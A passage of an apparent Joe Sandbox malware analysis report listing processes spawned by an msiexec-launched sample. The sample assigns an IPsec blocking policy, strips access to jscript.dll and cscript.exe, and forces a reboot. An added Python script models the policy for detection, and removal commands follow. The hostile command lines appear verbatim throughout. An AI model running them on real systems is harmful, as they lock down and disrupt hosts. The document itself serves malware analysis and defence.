Start time: 05:29:50 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6056 Parent PID: 5248

General

Start time: 05:29:51 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static set policy name=qianye assign=y Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1256 Parent PID: 6056

General

Start time: 05:29:51 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language
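The netsh.exe processes spawned by msiexec.exe PID 5248 (PID 1692 through PID 6056) are one procedure: create the IPsec policy qianye, create the filter list Filter1, add seventeen filters to it, create the block action FilteraAtion1 (the misspelling is the sample's), bind them with Rule1, and finally assign the policy, which is the step that makes it take effect. The script below is an added example, not part of the Joe Sandbox report and not the sample's code: it replays those command lines (copied from the entries above with the executable path and quoting dropped) into a small model and reports what the assigned policy blocks. Function names are the example's own.

```python
"""Rebuild the IPsec policy that the netsh.exe children of msiexec.exe PID 5248 assemble."""

# The netsh.exe command lines from the process entries above, in start-time order, with the
# executable path and quoting dropped. The loops only save space: each generated entry is one
# netsh.exe process in the report.
INBOUND = [("445", "TCP"), ("135", "TCP"), ("139", "TCP"),
           ("445", "UDP"), ("135", "UDP"), ("139", "UDP")]
OUTBOUND_TCP = ["2222", "3333", "4444", "5555", "6666", "7777",
                "8888", "9000", "9999", "14443", "14444"]
NETSH_CMDLINES = (
    ["netsh.exe ipsec static add policy name=qianye",
     "netsh.exe ipsec static add filterlist name=Filter1"]
    + [f"netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me "
       f"dstport={port} protocol={proto}" for port, proto in INBOUND]
    + [f"netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any "
       f"dstport={port} protocol=TCP" for port in OUTBOUND_TCP]
    + ["netsh.exe ipsec static add filteraction name=FilteraAtion1 action=block",
       "netsh.exe ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 "
       "filteraction=FilteraAtion1",
       "netsh.exe ipsec static set policy name=qianye assign=y"]
)


def parse_netsh_ipsec(cmdline):
    """Return (verb, object, params) for a 'netsh ipsec static ...' command line, else None."""
    toks = cmdline.replace("'", "").replace('"', "").split()
    if "ipsec" not in toks:
        return None
    i = toks.index("ipsec")
    if toks[i + 1:i + 2] != ["static"] or len(toks) < i + 4:
        return None
    params = dict(t.split("=", 1) for t in toks[i + 4:] if "=" in t)
    return toks[i + 2].lower(), toks[i + 3].lower(), {k.lower(): v for k, v in params.items()}


def build_ipsec_model(cmdlines):
    """Replay the commands into policies, filter lists and filter actions, keyed by name."""
    policies, filterlists, filteractions = {}, {}, {}
    for line in cmdlines:
        parsed = parse_netsh_ipsec(line)
        if parsed is None:
            continue
        verb, obj, p = parsed
        if (verb, obj) == ("add", "policy"):
            policies[p["name"]] = {"assigned": False, "rules": []}
        elif (verb, obj) == ("add", "filterlist"):
            filterlists.setdefault(p["name"], [])
        elif (verb, obj) == ("add", "filter"):
            filterlists.setdefault(p["filterlist"], []).append(p)
        elif (verb, obj) == ("add", "filteraction"):
            filteractions[p["name"]] = p.get("action", "").lower()
        elif (verb, obj) == ("add", "rule"):
            policies.setdefault(p["policy"], {"assigned": False, "rules": []})["rules"].append(p)
        elif (verb, obj) == ("set", "policy"):
            policies.setdefault(p["name"], {"assigned": False, "rules": []})["assigned"] = (
                p.get("assign", "n").lower() in ("y", "yes"))
    return policies, filterlists, filteractions


def blocked_traffic(cmdlines):
    """(inbound, outbound) sets of (protocol, port) that an assigned policy blocks.

    Only assigned policies are enforced and only rules whose filter action is 'block'
    count; dstaddr=Me marks traffic to this host, srcaddr=Me traffic leaving it.
    """
    policies, filterlists, filteractions = build_ipsec_model(cmdlines)
    inbound, outbound = set(), set()
    for pol in policies.values():
        if not pol["assigned"]:
            continue
        for rule in pol["rules"]:
            if filteractions.get(rule.get("filteraction")) != "block":
                continue
            for f in filterlists.get(rule.get("filterlist"), []):
                key = (f.get("protocol", "ANY").upper(), f.get("dstport", "any"))
                (inbound if f.get("dstaddr", "").lower() == "me" else outbound).add(key)
    return inbound, outbound


if __name__ == "__main__":
    inbound, outbound = blocked_traffic(NETSH_CMDLINES)
    print("policy assigned:", build_ipsec_model(NETSH_CMDLINES)[0]["qianye"]["assigned"])
    print("blocked inbound :", sorted(inbound))
    print("blocked outbound:", sorted(outbound))
```

Run against the report's command lines, the model shows inbound TCP and UDP 135, 139 and 445 to the host blocked (RPC endpoint mapper, NetBIOS session and SMB) together with outbound TCP to 2222, 3333, 4444, 5555, 6666, 7777, 8888, 9000, 9999, 14443 and 14444; the report does not say what those outbound ports are for, so the example does not guess. Two practical caveats: netsh ipsec static filters are mirrored by default, so a filter written as any to Me also matches the reverse direction, and nothing is enforced until the set policy ... assign=y step, which is therefore the line to alert on. On a live host the same state can be listed with netsh ipsec static show policy all, and a policy like this one is removed with netsh ipsec static set policy name=qianye assign=n followed by netsh ipsec static delete policy name=qianye.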

Analysis Process: takeown.exe PID: 644 Parent PID: 5248

General

Start time: 05:29:52 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\jscript.dll Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2376 Parent PID: 644

General

Start time: 05:29:52 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 4956 Parent PID: 5248

General

Start time: 05:29:53 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\jscript.dll /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 496 Parent PID: 4956

General

Start time: 05:29:54 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: takeown.exe PID: 4488 Parent PID: 5248

General

Start time: 05:29:55 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\jscript.dll Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2100 Parent PID: 4488

General

Start time: 05:29:55 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 3940 Parent PID: 5248

General

Start time: 05:29:56 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\jscript.dll /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 4132 Parent PID: 3940

General

Start time: 05:29:56 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: takeown.exe PID: 2212 Parent PID: 5248

General

Start time: 05:29:58 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\cscript.exe Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1712 Parent PID: 2212

General

Start time: 05:29:59 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 2604 Parent PID: 5248

General

Start time: 05:30:02 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\cscript.exe /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5548 Parent PID: 2604

General

Start time: 05:30:02 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: takeown.exe PID: 5504 Parent PID: 5248

General

Start time: 05:30:04 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\cscript.exe Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5864 Parent PID: 5504

General

Start time: 05:30:04 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 5268 Parent PID: 5248

General

Start time: 05:30:05 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\cscript.exe /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6108 Parent PID: 5268

General

Start time: 05:30:06 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: powercfg.exe PID: 6092 Parent PID: 5248

General

Start time: 05:30:07 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\powercfg.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\powercfg.exe' /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c Imagebase: 0xe60000 File size: 80896 bytes MD5 hash: FA313DB034098C26069DBADD6178DEB3 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6044 Parent PID: 6092

General

Start time: 05:30:07 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: powershell.exe PID: 6072 Parent PID: 5248

General

Start time: 05:30:07 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Start-Sleep -Seconds 900; Restart-Computer -Force Imagebase: 0x12f0000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET

Analysis Process: conhost.exe PID: 3556 Parent PID: 6072

General

Start time: 05:30:08 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Disassembly

Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 33.0.0 White Diamond
